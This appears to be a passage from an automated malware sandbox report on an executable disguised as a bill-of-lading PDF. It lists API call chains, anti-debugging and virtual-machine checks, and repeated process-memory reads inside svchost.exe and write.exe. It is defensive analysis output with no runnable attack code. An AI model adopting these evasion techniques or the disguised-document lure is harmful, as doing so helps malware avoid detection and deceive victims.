            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023CC300 FindFirstFileW,FindNextFileW,FindClose,6_2_023CC300
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: gNKNuXuipEBZec.exe, 00000007.00000002.4198012088.0000000000E1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
            Source: write.exe, 00000006.00000002.4197383900.0000000002885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000002.1753904169.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c18-806e6f6e6963}#0000000007500000#{f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C22
            Source: firefox.exe, 00000008.00000002.2484909615.00000206B7D0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-83306
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-83185
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417703 LdrLoadDll,1_2_00417703
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_04022278 mov eax, dword ptr fs:[00000030h]0_2_04022278
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_040238C8 mov eax, dword ptr fs:[00000030h]0_2_040238C8
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_04023928 mov eax, dword ptr fs:[00000030h]0_2_04023928
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h]1_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h]1_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h]1_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h]1_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h]1_2_03CD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h]1_2_03D0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h]1_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h]1_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h]1_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h]1_2_03D062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h]1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h]1_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h]1_2_03D0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h]1_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h]1_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h]1_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]1_2_03C2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]1_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]1_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]1_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h]1_2_03C280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
